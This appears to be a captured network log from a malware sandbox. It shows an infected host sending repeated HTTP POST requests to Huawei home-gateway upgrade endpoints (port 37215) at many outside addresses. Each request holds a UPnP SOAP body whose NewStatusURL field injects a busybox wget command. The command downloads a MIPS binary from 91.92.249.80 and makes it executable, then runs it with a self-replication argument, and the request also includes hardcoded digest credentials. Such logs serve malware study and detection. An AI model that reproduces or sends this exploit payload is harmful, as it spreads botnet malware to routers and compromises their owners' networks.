                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2389192.168.2.2332946197.225.30.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.684973955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2390192.168.2.234851841.105.78.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.684974909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2391192.168.2.234340841.31.1.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685020924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2392192.168.2.235689841.154.174.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685029984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2393192.168.2.2341444197.138.195.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685040951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2394192.168.2.234320841.116.20.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685455084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2395192.168.2.2344404197.121.139.12737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685508013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2396192.168.2.2355946197.205.30.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685508013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2397192.168.2.2340586197.44.185.10537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685596943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2398192.168.2.2336452157.1.157.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685652018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2399192.168.2.234288841.169.150.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685702085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
